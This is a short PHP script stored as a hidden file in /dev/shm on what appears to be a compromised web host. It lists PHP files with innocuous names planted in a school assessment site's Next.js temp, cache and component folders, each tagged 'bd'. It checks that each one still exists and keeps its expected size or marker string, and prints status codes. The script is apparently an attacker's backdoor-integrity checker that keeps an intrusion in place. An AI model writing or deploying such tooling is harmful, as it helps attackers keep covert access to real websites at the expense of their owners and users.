File: //dev/shm/.mrk
<?php $r = '/home/letariilmu/penilaian.lestariilmu.id'; $x = ["/temp/src/libs/firebase/database/english_mimes.php"=>"bd@@117292@@574",
"/temp/src/components/Tab/Rekap/masterCoursesEN.php"=>"bd@@117293@@2537",
"/analytic/Name.php"=>"bd@@117295@@1583",
"/_next/static/chunks/pages/rekap/[id]/[schoolId]/preferences.php"=>"bd@@117302@@701",
"/temp/.next/server/pages/rekap/[id]/left_menu_var.php"=>"bd@@117305@@648",
"/temp/src/components/Table/ocaml.php"=>"bd@@116817@@1637",
"/temp/src/components/Tab/Rekap/hw.php"=>"bd@@116088@@api_gateway",
"/temp/.next/cache/swc/plugins/v4/send.php"=>"bd@@97403@@636",
"/temp/.next/cache/swc/plugins/v4/send.php"=>"bd@@116149@@api_gateway",
"/temp/src/components/Table/switch.php"=>"bd@@62160@@event_dispatcher"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');